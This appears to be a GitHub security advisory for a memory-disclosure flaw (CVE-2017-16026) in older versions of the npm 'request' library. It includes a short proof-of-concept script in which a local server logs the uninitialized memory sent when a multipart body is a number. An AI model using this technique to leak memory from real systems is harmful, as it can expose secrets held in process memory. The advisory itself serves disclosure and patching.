Skip to content

Remote Memory Exposure in request

Moderate severity GitHub Reviewed Published Nov 9, 2018 • Updated Jan 8, 2021

Package

npm request (npm)

Affected versions

>= 2.49.0, < 2.68.0
>= 2.2.6, < 2.47.0

Patched versions

2.68.0
2.68.0

Description

Affected versions of request will disclose local system memory to remote systems in certain circumstances. When a multipart request is made, and the type of body is number, then a buffer of that size will be allocated and sent to the remote server as the body.

Proof of Concept

var request = require('request');
var http = require('http');

var serveFunction = function (req, res){
	req.on('data', function (data) {
            console.log(data)
        });
	res.end();
};
var server = http.createServer(serveFunction);
server.listen(8000);

request({
	method: "POST",
	uri: 'http://localhost:8000',
	multipart: [{body:500}]
},function(err,res,body){});

Recommendation

Update to version 2.68.0 or later

References

Severity

Moderate

Weaknesses

CVE ID

CVE-2017-16026

GHSA ID

GHSA-7xfp-9c55-5vqj

Source code

No known source code
Checking history
See something to contribute? Suggest improvements for this vulnerability.